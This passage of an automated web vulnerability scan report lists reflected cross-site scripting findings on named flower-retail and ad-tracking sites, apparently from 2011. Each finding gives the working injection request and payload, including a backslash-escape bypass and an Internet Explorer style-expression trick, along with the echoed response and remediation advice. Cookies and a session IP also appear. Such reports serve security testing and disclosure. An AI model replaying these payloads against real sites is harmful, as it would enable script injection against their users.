Referer: https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=293461
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:35:04 GMT
Content-Length: 49389


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "PBS66d3d\\";alert(1)//c331d736d2e"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event6";

   if ("" != "") {
       events +
...[SNIP]...

4.176. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/Order.aspx [trackingpgroup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/Order.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e370\"%3balert(1)//51a496b9619 was submitted in the trackingpgroup parameter. This input was echoed as 5e370\\";alert(1)//51a496b9619 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/Order.aspx?flexShown=False&deliveryon=True&scAddItem=true&flexChosen=False&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&selectedrelationshipID=293461&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5/25/2011&pid=30008396&ssid=27&COBRAND=pfc&trackingpgroup=PBS5e370\"%3balert(1)//51a496b9619&ShowGiftOptions=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:34:53 GMT
Content-Length: 62306


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "PBS5e370\\";alert(1)//51a496b9619"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event42";

   if ("" != "") {
       events
...[SNIP]...

4.177. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx [trackingpgroup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a02c\"%3balert(1)//1b2e7429a7 was submitted in the trackingpgroup parameter. This input was echoed as 6a02c\\";alert(1)//1b2e7429a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA&trackingpgroup=PBS6a02c\"%3balert(1)//1b2e7429a7&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f24%2f2011&pid=30003767&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=168084 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253APLA7139-8%252522PeaceLily(Sympathy)%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:22:47 GMT
Content-Length: 46930


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "PBS6a02c\\";alert(1)//1b2e7429a7"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event3";

   if ("" != "") {
       events +
...[SNIP]...

4.178. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/Order.aspx [trackingpgroup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/Order.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67d3f\"%3balert(1)//4a4ac1ba8fa was submitted in the trackingpgroup parameter. This input was echoed as 67d3f\\";alert(1)//4a4ac1ba8fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/Order.aspx?flexShown=False&deliveryon=True&scAddItem=true&flexChosen=False&tile=hmpg_podA&selectedrelationshipID=168084&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5/24/2011&pid=30003767&ssid=27&COBRAND=pfc&trackingpgroup=PBS67d3f\"%3balert(1)//4a4ac1ba8fa&ShowGiftOptions=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253APLA7139-8%252522PeaceLily(Sympathy)%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:30:09 GMT
Content-Length: 46934


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "PBS67d3f\\";alert(1)//4a4ac1ba8fa"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event3";

   if ("" != "") {
       events +
...[SNIP]...

4.179. https://orders.proflowers.com/OrderProcess/Order.aspx [trackingpgroup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/Order.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24de3\"%3balert(1)//6387582c293 was submitted in the trackingpgroup parameter. This input was echoed as 24de3\\";alert(1)//6387582c293 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /OrderProcess/Order.aspx?flexShown=False&scAddItem=true&flexChosen=False&tile=hmpg_carousel&selectedrelationshipID=428685&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5/25/2011&pid=30050137&ssid=27&COBRAND=pfc&ShowGiftOptions=True&trackingpgroup=HPC24de3\"%3balert(1)//6387582c293&deliveryon=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253AM232-NEWDELUXEMOTHERSDAYBQT%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:24:34 GMT
Content-Length: 46946


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "HPC24de3\\";alert(1)//6387582c293"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event3";

   if ("" != "") {
       events +
...[SNIP]...

4.180. http://pixel.fetchback.com/serve/fb/pdc [name parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 2ccab<x%20style%3dx%3aexpression(alert(1))>059125350e6 was submitted in the name parameter. This input was echoed as 2ccab<x style=x:expression(alert(1))>059125350e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /serve/fb/pdc?cat=&name=landing2ccab<x%20style%3dx%3aexpression(alert(1))>059125350e6&sid=3006 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304695062_13981:0_13479:0_15758:159333_12704:159333_4895:587518_10164:951794_10638:951794_10640:951794_10641:951794_1437:951794_1660:1515390; uid=1_1304695062_1303179323923:6792170478871670; kwd=1_1304695062_12936:0_11317:951794_11717:951794_11718:951794_11719:951794; sit=1_1304695062_3455:0:0_2988:222280:188109_3801:334723:334303_1714:619256:587518_3306:846882:159333_719:952621:951794_2451:1003490:998390_3236:1161453:1161335_782:1515739:1515390; cre=1_1304695062_29802:59536:1:334091_29805:59534:1:334752; bpd=1_1304695062_1ZCU5:3YJ3; apd=1_1304695062; scg=1_1304695062; ppd=1_1304695062; afl=1_1304695062

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:02:56 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1304902976_13981:207914_13479:207914_15758:367247_12704:367247_4895:795432_10164:1159708_10638:1159708_10640:1159708_10641:1159708_1437:1159708_1660:1723304; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: uid=1_1304902976_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: kwd=1_1304902976_12936:207914_11317:1159708_11717:1159708_11718:1159708_11719:1159708; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: sit=1_1304902976_3455:207914:207914_2988:430194:396023_3801:542637:542217_1714:827170:795432_3306:1054796:367247_719:1160535:1159708_2451:1211404:1206304_3236:1369367:1369249_782:1723653:1723304; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: cre=1_1304902976_29802:59536:1:542005_29805:59534:1:542666; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: bpd=1_1304902976_1ZCU5:4QOV; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: apd=1_1304902976; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: scg=1_1304902976; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: ppd=1_1304902976; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: afl=1_1304902976; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 01:02:56 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91

<!-- campaign : 'landing2ccab<x style=x:expression(alert(1))>059125350e6' *not* found -->

4.181. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [Ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The value of the Ref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 141b9\"%3balert(1)//08331235fa2 was submitted in the Ref parameter. This input was echoed as 141b9\\";alert(1)//08331235fa2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef141b9\"%3balert(1)//08331235fa2 HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
